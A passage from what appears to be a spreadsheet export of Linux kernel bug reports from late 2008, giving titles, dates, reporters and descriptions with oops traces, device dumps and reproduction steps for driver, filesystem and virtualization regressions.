[&lt;ffffffffa00fd594&gt;] usb_kill_urb+0x6b/0xfa [usbcore] kernel: [&lt;ffffffff803c3a61&gt;] ? skb_dequeue+0x5b/0x66 kernel: [&lt;ffffffffa048f32d&gt;] rtl8187_stop+0x278/0x28d [rtl8187] A fix is now undergoing testing and will be submitted through the wireless-testing tree. This bug may be related to bugzilla entry 11887. Steps to reproduce: Use SLUB with debugging enabled, boot with the option 'slub_debug=P', and 'modprobe -r rtl8187'.</t>
  </si>
  <si>
    <t>2.6.28-rc7-git8 framebuffer corrupted at boot</t>
  </si>
  <si>
    <t>2.6.28-rc7-git8</t>
  </si>
  <si>
    <t>2008-12-10 02:46 UTC</t>
  </si>
  <si>
    <t>2008-12-11 11:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28-rc7-git7 Earliest failing kernel version: 2.6.28-rc7-git8 Distribution: Debian Sid Hardware Environment: Athlon 64 X2 4200+ / Radeon 9250 Software Environment:X86_64 Problem Description: At boot, the concole is unreadable. All lines are corrupted with some overwrite. Steps to reproduce: boot the system I've rebuilt 2.6.28-rc7-git7 and 2.6.28-rc7-git8 with the same config file. The problems always occurs with git8 and never with git7 Regards Jean-Luc</t>
  </si>
  <si>
    <t>dd make kernel panic</t>
  </si>
  <si>
    <t>2008-12-10 18:07 UTC</t>
  </si>
  <si>
    <t>2008-12-21 11:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.27 Earliest failing kernel version:2.6.28-rc2 Distribution: RHEL 4u2 Hardware Environment: IA64 Software Environment: Problem Description: When we use dd tool to clear a SCSI disk. it may getinto a kernel panic like below: Unable to handle kernel NULL pointer dereference (address 0000000000000044) ksoftirqd/1[6]: Oops 8813272891392 [1] Modules linked in: Pid: 6, CPU 1, comm: ksoftirqd/1 psr : 00001010081a6010 ifs : 8000000000000289 ip : [&lt;a000000100391cf0&gt;] Not tainted (2.6.28-rc6) ip is at scsi_softirq_done+0x50/0x2e0 unat: 0000000000000000 pfs : 0000000000000184 rsc : 0000000000000003 rnat: 0000000000000000 bsps: 0000000000000000 pr : 0000000000005a81 ldrs: 0000000000000000 ccv : 0000000000000002 fpsr: 0009804c8a70433f csd : 0000000000000000 ssd : 0000000000000000 b0 : a00000010023f910 b6 : a000000100391ca0 b7 : a00000010000b220 f6 : 1003e0000000000001d4c f7 : 1003e0000000000200000 f8 : 1003e0000000080000000 f9 : 1003e0000054a28eb9332 f10 : 1003eb59a50a4dbb025f6 f11 : 1003e00000000000000c7 r1 : a000000100a1b720 r2 : e000000001105e48 r3 : e00000000cff9518 r8 : e00000000cff9510 r9 : ffffffffffff5e48 r10 : 0000000000000018 r11 : 0000000000000044 r12 : e000000008a97e10 r13 : e000000008a90000 r14 : e000000008a97e30 r15 : e000000008a97e38 r16 : 0000000000000020 r17 : 0000000000000030 r18 : e00000000cff9650 r19 : e00000000cff95e0 r20 : a00000010082eea8 r21 : a000000100391ca0 r22 : e000000001e9ab70 r23 : e000000001e9aac8 r24 : e00000000cff9540 r25 : e000000008a97e30 r26 : e000000008a97e30 r27 : e00000000cff9518 r28 : e000000008a97e38 r29 : 0000000000000000 r30 : 0000000000000000 r31 : 0000000000000000 Call Trace: [&lt;a000000100012870&gt;] show_stack+0x50/0xa0 sp=e000000008a979e0 bsp=e000000008a90eb0 [&lt;a000000100013150&gt;] show_regs+0x830/0x860 sp=e000000008a97bb0 bsp=e000000008a90e68 [&lt;a000000100022a60&gt;] die+0x1c0/0x2c0 sp=e000000008a97bb0 bsp=e000000008a90e20 [&lt;a000000100042350&gt;] ia64_do_page_fault+0x830/0x960 sp=e000000008a97bb0 bsp=e000000008a90db8 [&lt;a00000010000ba20&gt;] ia64_native_leave_kernel+0x0/0x270 sp=e000000008a97c40 bsp=e000000008a90db8 [&lt;a000000100391cf0&gt;] scsi_softirq_done+0x50/0x2e0 sp=e000000008a97e10 bsp=e000000008a90d70 [&lt;a00000010023f910&gt;] blk_done_softirq+0x170/0x1c0 sp=e000000008a97e20 bsp=e000000008a90d58 [&lt;a00000010006a8b0&gt;] __do_softirq+0x110/0x2e0 sp=e000000008a97e30 bsp=e000000008a90cc8 [&lt;a00000010006aaf0&gt;] do_softirq+0x70/0xc0 sp=e000000008a97e30 bsp=e000000008a90c68 [&lt;a00000010006c2d0&gt;] ksoftirqd+0xf0/0x240 sp=e000000008a97e30 bsp=e000000008a90c40 [&lt;a00000010008df80&gt;] kthread+0xa0/0x120 sp=e000000008a97e30 bsp=e000000008a90c10 [&lt;a000000100014430&gt;] kernel_thread_helper+0x30/0x60 sp=e000000008a97e30 bsp=e000000008a90be0 [&lt;a00000010000a0c0&gt;] start_kernel_thread+0x20/0x40 sp=e000000008a97e30 bsp=e000000008a90be0 Kernel panic - not syncing: Aiee, killing interrupt handler! Steps to reproduce: while true; do echo "3"&gt;/proc/sys/vm/drop_caches; dd if=/dev/sdb2 of=/dev/zero bs=1024k count=8900; done;</t>
  </si>
  <si>
    <t>cpufreq does not work for Intel Celeron 550 without a patch</t>
  </si>
  <si>
    <t>2008-12-11 00:13 UTC</t>
  </si>
  <si>
    <t>2008-12-22 09:45 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.22 Distribution: OpenSUSE 10.3 Hardware Environment: Toshiba Satellite L300-11E Laptop; CPU Intel Celeron 550 @ 2GHz Software Environment: Problem Description: Cpufreq does not work even being loaded by hands. But after I applied a patch from the address 'http://ecarux.de/files/misc/cpufreq-celeron-2.6.24.patch' (I failed to establish the name of its author) that just adds a line to 'arch/x86/kernel/cpu/cpufreq/p4-clockmod.c', cpufreq seems to work perfectly after loading this module. Steps to reproduce: Just boot the computer and look into the directory '/sys/devices/system/cpu/cpu0'. There is no 'cpufreq' subdir in it. Attempts to load any of modules from 'arch/x86/kernel/cpu/cpufreq' fails ('No such device') except 'speedstep-lib' which produces nothing.</t>
  </si>
  <si>
    <t>can't select appropriate tuner driver under certain configuration</t>
  </si>
  <si>
    <t>2.6.28-rc8</t>
  </si>
  <si>
    <t>2008-12-12 05:15 UTC</t>
  </si>
  <si>
    <t>2009-01-01 07:35 UTC</t>
  </si>
  <si>
    <t>Testing under 2.6.27.8 and also reproduced by me on 2.6.28-rc8, Alexey at https://bugs.gentoo.org/show_bug.cgi?id=245106 has found a configuration which allows him to select CONFIG_DVB_DIB0700 but does *not* allow him to select his tuner driver (mt2060) which is not enabled in the config. This is fully reproducible and you don't need the hardware to see the configuration complication. Here's how to do it: 1. make defconfig 2. make menuconfig Navigate and enable the following (I'm doing them as modules, accepting all defaults for other options) CONFIG_DVB_CORE CONFIG_DVB_FE_CUSTOMISE CONFIG_DVB_USB CONFIG_DVB_USB_DIB0700 then save and exit 4. grep MT2060 .config --&gt; no results 5. Go back into menuconfig and observe that CONFIG_MEDIA_TUNER_MT2060 is not selectable until you enable CONFIG_MEDIA_TUNER_CUSTOMIZE which is recommended to be left off. Without the tuner driver installed, tuning doesn't work correctly. And it seems to me that the intended behaviour for the MEDIA_TUNER_CUSTOMIZE=n case is for the tuner to be automatically enabled, which is not happening here.</t>
  </si>
  <si>
    <t>AlpsPS/2 ALPS Glidepoint back/forward buttons incorrectly handled</t>
  </si>
  <si>
    <t>2.6.27.8</t>
  </si>
  <si>
    <t>2008-12-12 12:42 UTC</t>
  </si>
  <si>
    <t>Māris Vilks</t>
  </si>
  <si>
    <t>2012-05-22 18:53 UTC</t>
  </si>
  <si>
    <t>Distribution: Archlinux Problem Description: AlpsPS/2 ALPS GlidePoint (in Acer Aspire 5520 laptop) touchpad buttons incorrectly detected. This touchpad has left/right buttons and a 4-way scrolling button (up/down/back/forward). Current psmouse module treats back button as middle, but forward button does not get treated at all. Information gathered so far: using i8042.debug=1 I was able to get byte packets for each button: left = packet[3] &amp; 1 right = packet[3] &amp; 2 up = packet[2] &amp; 4 down = packet[0] &amp; 16 back = packet[3] &amp; 4 forward = packet[0] &amp; 32 (This differs a little from "ALPS absolute Mode" given in alps.c) And, if I got it correctly, this touchpad identifies itself with signature {0x74, 0x02, 0x50} What more info could I provide?</t>
  </si>
  <si>
    <t>Freecom 1TB Firewire drive claims max_rom = 2 but can only handle max_rom = 0</t>
  </si>
  <si>
    <t>2008-12-12 12:57 UTC</t>
  </si>
  <si>
    <t>Christian Mueller</t>
  </si>
  <si>
    <t>2008-12-20 03:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: None Earliest failing kernel version: None Distribution: Debian Etch, Kernel 2.6.22 from backports.org Hardware Environment: - Gigabyte GA-MA790GP-DS4H (AMD790GP, TI OHCI 1394 controller) - AMD Phenom 9550 - 32 bits - 2GB RAM - Freecom FireWire Harddrive 1TB Software Environment: N/A Problem Description: When connecting the Freecom drive, the IEEE subsystem recognizes the new node but fails to configure it. I added debug prints to the drivers and the outcome was the following: ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[17] MMIO=[fdcff000-fdcff7ff] Max Packet=[2048] IR/IT contexts=[4/8] csr1212: bus_read(0xfffff0000400, 64) csr1212: kv_len = 20 ieee1394: Node added: ID:BUS[0-00:1023] GUID[0001db800000007b] csr1212: bus_read(0xfffff0000400, 1024) csr1212: kv_len = 16 ieee1394: Host added: ID:BUS[0-01:1023] GUID[00a8d5e000001fd0] ieee1394: processing root directory for 0-00:1023 ieee1394: processing root dir entry: key.id = 3, key.type = 0, value = 0x00001b8c csr1212: bus_read(0xfffff0000480, 64) csr1212: kv_len = 4116 csr1212: kv_len ends beyond ConfigROM; kv-&gt;offset = 1152, cache-&gt;offset = 1024, cache-&gt;size = 1024 ieee1394: processing root directory for 0-01:1023 ieee1394: processing root dir entry: key.id = 3, key.type = 0, value = 0x0000a8d5 ieee1394: processing root dir entry: key.id = 1, key.type = 2, value = 0x00000006 ieee1394: processing root dir entry: key.id = 12, key.type = 0, value = 0x000083c0 Note how csr1212 tries to read 64 bytes from the bus to get a textual node with the vendor name but gets a length of 4116 bytes which exceeds the size of the configuration ROM. Using an [outdated and hacked] version of ieee1394diag, it showed the same general problem; further poking around reveiled that the first quadlet of the textual node had the same CRC checksum as the bus info block. That was too much of a coincidence, of course -- it seemed as if the read_bus() operation returned the same buffer as when it was previously called to get the bus info block. Seeing all the quirks in csr1212.c about devices claiming max_rom values which they can't handle, I forced the max_rom value down to 4 bytes and, presto, the hard disk was recognized properly and works fine ever since. I would suggest to add a module parameter to ieee1394 (in csr1212.c) like so: #include &lt;linux/module.h&gt; #include &lt;linux/moduleparam.h&gt; static int max_rom_io = -1; module_param(max_rom_io, int, S_IRUGO | S_IWUSR); MODULE_PARM_DESC(max_rom_io, "maximum I/O size for configuration ROM; default: -1 (use node default), values: 0/1/2 (maps to 4/64/1024 bytes)"); Further down in csr1212.c, allow the module parameter to override the max_rom value retrieved from the device: *** existing code *** if (!csr-&gt;ops-&gt;get_max_rom) { csr-&gt;max_rom = mr_map[0]; /* default value */ } else { int i = csr-&gt;ops-&gt;get_max_rom(csr-&gt;bus_info_data, csr-&gt;private); if (i &amp; ~0x3) return -EINVAL; csr-&gt;max_rom = mr_map[i]; } *** new code *** /* allow module parameter to override max_rom */ if (max_rom_io != -1 &amp;&amp; (max_rom_io &amp; ~0x3) == 0) csr-&gt;max_rom = mr_map[max_rom_io]; I did not include a patch because my kernel is rather old (2.6.22), has patches from Debian, etc. Steps to reproduce: - Attach a Freecom FireWide 1TB Harddrive to any any firewire-capable Linux box.</t>
  </si>
  <si>
    <t>uml is very slow on 2.6.28 host</t>
  </si>
  <si>
    <t>2008-12-12 14:40 UTC</t>
  </si>
  <si>
    <t>2009-03-23 13:11 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] uml is very slow on 2.6.28 host Submitter : Miklos Szeredi &lt;miklos@szeredi.hu&gt; Date : 2008-12-12 9:35 References : http://marc.info/?l=linux-kernel&amp;m=122907463518593&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>add 5372:2303 to /drivers/usb/serial/pl2303</t>
  </si>
  <si>
    <t>2.6.24-22-generic</t>
  </si>
  <si>
    <t>2008-12-13 00:29 UTC</t>
  </si>
  <si>
    <t>matthew.arnold-1</t>
  </si>
  <si>
    <t>2010-01-25 14:14 UTC</t>
  </si>
  <si>
    <t>Distro: Ubuntu 8.04.1 Problem: an unbranded USB-serial converter is not detected Steps taken to resolve the problem: (unsuccessful) force usb-serial detection by adding (Debian?) udev rules - detects device but incorrectly defaults to generic which doesn't work (successful) added vendor:product to pl2303 / recompile / insert module Further info: Windows drivers report "Cyber Logic" &amp; "EPT Micro" as brands. lsusb dump: Bus 003 Device 002: ID 5372:2303 Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x5372 idProduct 0x2303 bcdDevice 3.00 iManufacturer 1 Superial Technology Inc. iProduct 2 USB-Serial Controller iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 39 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0x80 (Bus Powered) MaxPower 100mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 3 bInterfaceClass 255 Vendor Specific Class bInterfaceSubClass 0 bInterfaceProtocol 0 iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x000a 1x 10 bytes bInterval 1 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x02 EP 2 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0040 1x 64 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x83 EP 3 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0040 1x 64 bytes bInterval 0 Device Status: 0x0000 (Bus Powered)</t>
  </si>
  <si>
    <t>Error when drm is loaded</t>
  </si>
  <si>
    <t>2008-12-13 09:59 UTC</t>
  </si>
  <si>
    <t>2009-01-11 10:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: maybe 2.6.28-rc6 Earliest failing kernel version: 2.6.28-rc8 Distribution: Gentoo Hardware Environment: Acer Travelmate 4001 Lmi, ATI Radeon Mobility 9700 Software Environment: Problem Description: Steps to reproduce: When the drm module is loaded during X startup, I get the following error: [ 55.642188] [drm] Initialized drm 1.1.0 20060810 [ 55.757559] [drm] Initialized radeon 1.29.0 20080528 on minor 0 [ 56.920297] agpgart-intel 0000:00:00.0: AGP 2.0 bridge [ 56.920314] agpgart-intel 0000:00:00.0: putting AGP V2 device into 4x mode [ 56.920347] pci 0000:01:00.0: putting AGP V2 device into 4x mode [ 57.686654] irq 6: nobody cared (try booting with the "irqpoll" option) [ 57.686660] Pid: 7472, comm: X Not tainted 2.6.28-rc8-git #22 [ 57.686663] Call Trace: [ 57.686671] [&lt;c0453414&gt;] __report_bad_irq+0x24/0x90 [ 57.686675] [&lt;c04535e9&gt;] note_interrupt+0x169/0x1b0 [ 57.686679] [&lt;c0452575&gt;] handle_IRQ_event+0x25/0x60 [ 57.686683] [&lt;c0453fa0&gt;] handle_level_irq+0x0/0xa0 [ 57.686686] [&lt;c045401c&gt;] handle_level_irq+0x7c/0xa0 [ 57.686688] &lt;IRQ&gt; [&lt;c04218c0&gt;] __do_softirq+0x0/0x100 [ 57.686695] [&lt;c0404727&gt;] common_interrupt+0x23/0x28 [ 57.686698] [&lt;c04218c0&gt;] __do_softirq+0x0/0x100 [ 57.686702] [&lt;c04218eb&gt;] __do_softirq+0x2b/0x100 [ 57.686705] [&lt;c04218c0&gt;] __do_softirq+0x0/0x100 [ 57.686707] &lt;IRQ&gt; [&lt;c0421895&gt;] irq_exit+0x45/0x70 [ 57.686712] [&lt;c0405e1f&gt;] do_IRQ+0x7f/0xd0 [ 57.686718] [&lt;c05dbbbe&gt;] io_schedule+0xe/0x20 [ 57.686721] [&lt;c0404727&gt;] common_interrupt+0x23/0x28 [ 57.686731] [&lt;e0ee007b&gt;] radeon_cp_dispatch_vertex+0x22b/0x370 [radeon] [ 57.686747] [&lt;e0df591f&gt;] drm_vblank_get+0x3f/0x160 [drm] [ 57.686751] [&lt;c0457b61&gt;] filemap_fault+0xe1/0x3d0 [ 57.686763] [&lt;e0df5f5f&gt;] drm_modeset_ctl+0x9f/0xb0 [drm] [ 57.686775] [&lt;e0df5ec0&gt;] drm_modeset_ctl+0x0/0xb0 [drm] [ 57.686786] [&lt;e0df43fa&gt;] drm_ioctl+0x1ba/0x2f0 [drm] [ 57.686791] [&lt;c046369e&gt;] __do_fault+0x15e/0x390 [ 57.686802] [&lt;e0df4240&gt;] drm_ioctl+0x0/0x2f0 [drm] [ 57.686807] [&lt;c0484dc9&gt;] vfs_ioctl+0x69/0x70 [ 57.686810] [&lt;c0484f6c&gt;] do_vfs_ioctl+0x5c/0x430 [ 57.686815] [&lt;c0414680&gt;] do_page_fault+0x0/0x6c0 [ 57.686819] [&lt;c041490c&gt;] do_page_fault+0x28c/0x6c0 [ 57.686824] [&lt;c047a2b6&gt;] vfs_write+0x106/0x140 [ 57.686853] [&lt;e1052c00&gt;] reiserfs_file_write+0x0/0xc0 [reiserfs] [ 57.686857] [&lt;c04853a8&gt;] sys_ioctl+0x68/0x80 [ 57.686860] [&lt;c0403bd9&gt;] sysenter_do_call+0x12/0x25 [ 57.686865] [&lt;c05d0000&gt;] unix_bind+0xd0/0x2b0 [ 57.686867] handlers: [ 57.686868] [&lt;e0d604a0&gt;] (usb_hcd_irq+0x0/0x70 [usbcore]) [ 57.686895] [&lt;e0d604a0&gt;] (usb_hcd_irq+0x0/0x70 [usbcore]) [ 57.686915] [&lt;e0d604a0&gt;] (usb_hcd_irq+0x0/0x70 [usbcore]) [ 57.686934] [&lt;e0e1da30&gt;] (b44_interrupt+0x0/0x100 [b44]) [ 57.686944] Disabling IRQ #6 [ 58.899533] [drm] Setting GART location based on new memory map [ 58.899541] [drm] Loading R300 Microcode [ 58.899589] [drm] Num pipes: 1 [ 58.899595] [drm] writeback test succeeded in 1 usecs It doesn't seems to cause any serious problem. Does anybody have any idea about this error ?</t>
  </si>
  <si>
    <t>journal activity on inactive partition causes inactive harddrive spinup</t>
  </si>
  <si>
    <t>2008-12-14 11:39 UTC</t>
  </si>
  <si>
    <t>C Sights</t>
  </si>
  <si>
    <t>2009-02-23 04:22 UTC</t>
  </si>
  <si>
    <t>fs_ext3@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.5 Earliest failing kernel version: 2.6.27.6 Distribution: Debian stable with custom compiled vanilla kernel Problem Description: Activity on one partition (hda1) causes kjournald to also write to another partition (sda1). This in turn causes the harddrive which contains sda1 to spinup or not spindown. I've activated laptop-mode using laptop-mode-tools. hda1 and sda1 are both formatted with ext3. On unaffected kernels (e.g. 2.6.27.5) btrace produces no output. On affected kernels (e.g. 2.6.27.6, 2.6.27-rc7) btrace produces output as below. /dev/hda1 on / type ext3 (rw,noatime,errors=remount-ro,commit=1209600) tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) udev on /dev type tmpfs (rw,mode=0755) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620) debugfs on /sys/kernel/debug type debugfs (rw) Steps to reproduce: 1. start "btrace /dev/sda" 2. begin compiling kernel 3. within seconds btrace begins output similar to below. Thanks for all your work! Sorry if I've misplaced blame for this undesirable change in behavior. Using 2.6.27.8, btrace of /dev/sda while compiling on /dev/hda1 Dec 9 11:15:32 localhost logger: 8,0 0 1 0.000000000 1109 A WS 14375 + 8 &lt;- (8,1) 14312 Dec 9 11:15:32 localhost logger: 8,0 0 2 0.000006705 1109 Q WS 14375 + 8 [kjournald] Dec 9 11:15:32 localhost logger: 8,0 0 3 0.000043581 1109 G WS 14375 + 8 [kjournald] Dec 9 11:15:32 localhost logger: 8,0 0 4 0.000065651 1109 P N [kjournald] Dec 9 11:15:32 localhost logger: 8,0 0 5 0.000076267 1109 I W 14375 + 8 [kjournald] Dec 9 11:15:32 localhost logger: 8,0 0 6 0.000300318 1109 D W 14375 + 8 [kjournald] Dec 9 11:15:32 localhost logger: 8,0 0 7 0.000423518 1109 U N [kjournald] 1 Dec 9 11:15:32 localhost logger: 8,0 0 8 0.010028373 3 C W 14375 + 8 [0] Dec 9 11:15:35 localhost logger: 8,0 0 9 3.219049689 1109 A WS 14383 + 8 &lt;- (8,1) 14320 Dec 9 11:15:35 localhost logger: 8,0 0 10 3.219058350 1109 Q WS 14383 + 8 [kjournald] Dec 9 11:15:35 localhost logger: 8,0 0 11 3.219095505 1109 G WS 14383 + 8 [kjournald] Dec 9 11:15:35 localhost logger: 8,0 0 12 3.219115061 1109 P N [kjournald] Dec 9 11:15:35 localhost logger: 8,0 0 13 3.219127074 1109 I W 14383 + 8 [kjournald] Dec 9 11:15:35 localhost logger: 8,0 0 14 3.219344699 1109 D W 14383 + 8 [kjournald] Dec 9 11:15:35 localhost logger: 8,0 0 15 3.219543607 1109 U N [kjournald] 1 Dec 9 11:15:35 localhost logger: 8,0 0 16 3.229477275 3 C W 14383 + 8 [0]</t>
  </si>
  <si>
    <t>From version 2.6.27.8 smbd lock ups kernel after 2-10 hours uptime. Keyboard, sshd, smbd, acpi button not work. Syslog and hdd not activity. but Nmap port scan and pinged normally on all ifaces.</t>
  </si>
  <si>
    <t>2008-12-14 12:51 UTC</t>
  </si>
  <si>
    <t>Petr Grigoriev</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.7 Earliest failing kernel version: 2.6.27.8 Distribution: Hardware Environment: First server - Athlon64 3000+ , ASUS K8N-E motherboard (NForce3, CK8S Ethernet), video S3 Trio 64V2 PCI, Comport PCI 9835 (2 COM), 3 network PCI-s (3c905B, DGE-528T, DL10050), soft md RAID on 2 IDE HDD. Second server: AthlonXP+ 2600, A7N8X-E Deluxe motherboard (NForce2), 3 DVB SkyStar3 PCI, 2 IDE HDD and 2 SATA HDD, video S3 Inc. ViRGE/DX. Three server: Intel Celeron 1100, ECS P6IPAT motherboard (i815e), 2 IDE HDD, 2 DVB Skystar2 PCI, 1 DVB SkyStar1 PCI, network RTL8139D and DL2000. all motherboard BIOS-s is latest version Software Environment: linux debian unstable, all pkg is up-to-date Problem Description: From version 2.6.27.8 smbd lock ups kernel after 1-10 hours uptime. Keyboard, sshd, smbd, acpi button not work. Syslog and hdd not activity. but Nmap port scan and pinged normally on all ifaces. tested configuration: Athlon64 2.6.27.7 - work Athlon64 2.6.27.8 - lock (gcc 3.4.6, 4.2.3) AthlonXP 2.6.27.7 - work AthlonXP 2.6.27.8 and .9 - lock (gcc 3.4.6 4.2.3) IntelCel1100 2.6.27.7 - work IntelCel1100 2.6.27.9 - lock (gcc 4.1.3) for each server - kernel compiled with own processor option. In lock state - keyboard not work, acpi power button to shutdown not work, sshd not work, apache not work, smb not work, but network scan nmap show this ports and ping is work. Hard drive led indicator not signal. /var/log/syslog not contain log string on this lock. Only powerbutton 5 sec or hard reset to reboot. Softdog daemon and module is runned and not work in lock state. Lock up's server five times - usually after work day in 18-19:00. Personal see server stops in 9:00 morning and reboot it three servers to work... Only one time after disable screen saver console I foto lock screen AthlonXP+ server and typed manually from foto: tda10086 snd_intel8x0 snd_mpu401 snd_ac97_codec snd_cs4232 snd_opl3_lib snd_hwdep snd_cs4231_1ib ac97_bus snd_pcm_oss snd_pcm snd_mpu401_uart snd_mixer_oss rtc_cmos snd_rawmidi snd_seq_oss rtc_core rtc_lib sata_sil floppy snd_seq_midi_event budget budget_core saa7146 libata snd_seq ttpci_eeprom scsi_mod dvb_core snd_timer snd_seq_device dock 8250_pnp skge snd soundcore forcedeth snd_page_alloc ehci_hcd ohci_hcd usbcore i2c_nforce2 i2c_core 8250 serial_core parport_pc parport thermal button processor nvidia_agp agpgart evdev unix Pid:7896, comm: smbd Not tainted (2.6.27.9 #15) EIP: 0060:[&lt;c02d4dd5&gt;l EFLAGS: 00000246 CPU: 0 EIP is at __mutex_lock_slowpath+0x143/0x154 EAX: ef7931ec EBX: c8ae1f28 ECX: c8ae0000 EDX: c8ae0000 ESI: ef7931e8 EDI: 00000246 EBP: ef875550 ESP: c8ae1f24 DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 CR0: 8005003b CR2: b786be90 CR3: 23451000 CR4: 000006f0 DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 DR6: ffff0ff0 DR7: 00000400 [&lt;c017f7cb&gt;] ? inotify_destroy+0x67/0xb1 [&lt;c017f918&gt;] ? inotify_release+0x17/0xb5 [&lt;c015edfd&gt;] ? __fput+0x8a/0x138 [&lt;c015c93f&gt;l ? filp_close+0x4d/0x53 [&lt;c015c991&gt;l ? sys_close+0x4c/0x7a [&lt;c010369a&gt;] 7 syscall_call+0x7/0xb ============================= On Athlon64 NX-bit is work, test_nx is syslog. In this time this 3 servers work normally (4 days uptime) on 2.6.27.7 kernel. Steps to reproduce: compile 2.6.27.8 or .9 kernel, run samba 3.2.5 daemon to share file on network... and server lock up's and not answer in any way, only pinged on all network interfaces. config file from AthlonXP+ 2600 http://rapidshare.com/files/173376113/config.rar</t>
  </si>
  <si>
    <t>D-Link 530 TX Rev. C2 not working</t>
  </si>
  <si>
    <t>2.6.27.X</t>
  </si>
  <si>
    <t>2008-12-15 00:00 UTC</t>
  </si>
  <si>
    <t>Gaspard</t>
  </si>
  <si>
    <t>2012-05-22 18:55 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 and 2.6.25 Earliest failing kernel version: 2.6.27.X Distribution: Actually Ubuntu 8.10 Deskstop (32 bit) and Fedora 10 Deskstop (32 bit) Hardware Environment: Always the same since many years to test different distributions: Asus P4P800 SE, GeForce 7800 GS in AGP, 2 x 1 GB DDR 1 Kingmax. Software Environment: just TeamSpeak Server on Ubuntu 8.10 and CCSM (Compiz Configurator). Fedora nothing more than original package. Just update from Fedora repositories. Problem Description: in the past this hardware working fine with previous version of distribution. Since the last version, my nertwork card doesn't work. I'm not a hacker, just want help you. Steps to reproduce: I have tested 2 distributions with install on my hardrive. Not working. I change hardrive to see on Windows (whith drivers of course) and my card working fine. The hardware working fine, but I think there is a problem with Linux driver. I haven't problem to connect internet with the onboard chip Marvell Yukon. I hope it's not a bug from Network Manager, but I think no. Thanks for reading. Regards. Oliver.</t>
  </si>
  <si>
    <t>2.6.27 vmware x86_64 guests panic on boot on VMware ESX</t>
  </si>
  <si>
    <t>2008-12-16 05:47 UTC</t>
  </si>
  <si>
    <t>Timo Gurr</t>
  </si>
  <si>
    <t>2008-12-22 10:27 UTC</t>
  </si>
  <si>
    <t>Zachary Amsden</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.8 Earliest failing kernel version: 2.6.27 Distribution: Gentoo vanilla-sources Hardware Environment: Blade System / AMD Opteron 2216 HE Software Environment: VMware ESX Server version=3.5.0 build=build-98103 Problem Description: VMware ESX 64bit guests running &gt;=2.6.27 fail to boot with a kernel panic Steps to reproduce: Compile &gt;=2.6.27 on a 64bit guest and boot as guest in VMware ESX Server version=3.5.0 build=build-98103. Kernel panics with following messages: Vanilla 2.6.27: Booting the kernel. Kernel alive Kernel really alive PANIC: early exception 0e rip 10:ffffffff8151558d error 0 cr2 fffffffeff34003d git-sources-2.6.28_rc8-r2: PANIC: early exception 0e rip 10:ffffffff815142c2 error 0 cr2 fffffffeff44003d This panic only appears when booting 64bit guests, 32bits guests boot just fine. Please let me know if I can provide further hopefully more useful information to resolve this. See http://bugs.gentoo.org/show_bug.cgi?id=250695</t>
  </si>
  <si>
    <t>Swap breaks after 2x hibernation failure due to lack of swap</t>
  </si>
  <si>
    <t>2008-12-16 13:14 UTC</t>
  </si>
  <si>
    <t>2009-03-19 04:05 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu 8.10 Hardware Environment: x86-64 Problem Description: If there is not enough swap to hibernate sucessfuly, and you try to hibernate twice in a row, the status of swap partitions is corrupted. Steps to reproduce: 1) Conspire to ensure insufficient swap space for hibernation 2) Attempt to hibernate, and fail 3) Attempt to hibernate *again*, and fail 4) try swapoff Outcome: # swapoff /dev/sda6 swapoff: /dev/sda6: Invalid argument # cat /proc/swaps Filename Type Size Used Priority /dev/sda6 partition 1494004 1350564 -1 More details about the resulting behaviour: Incidentally "swapoff -a" fails silently, which I think is a bug in swapoff (i.e. it should report the error). I don't see any backtraces in dmesg; the only errors it shows is the failure to hibernate If I free up some memory and try to hibernate again, I get a different error - "Cannot find swap device, try swapon -a.". Now swapon -a doesn't work, but if I target the specific device... # swapon /dev/sda6 # cat /proc/swaps Filename Type Size Used Priority /dev/sda6 partition 1494004 331060 -1 /dev/sda6 partition 1494004 0 -2 Wheee! Interestingly I can now hibernate and resume. But it's not safe; my desktop session dies horribly. Thanks Alan [ 1541.499324] kdeinit[10614]: segfault at 0 ip 00007fbd8515139a sp 00007fff8e04cf80 error 4 in libc-2.7.so[7fbd850dc000+158000] [ 1541.520988] kdeinit[7322]: segfault at 0 ip 00007fbd8515139a sp 00007fff8e04cf50 error 4 in libc-2.7.so[7fbd850dc000+158000] [ 1541.545512] kio_file[7343]: segfault at ffffffff00000000 ip ffffffff00000000 sp 00007fff8e04c8a8 error 14 [ 1541.680883] 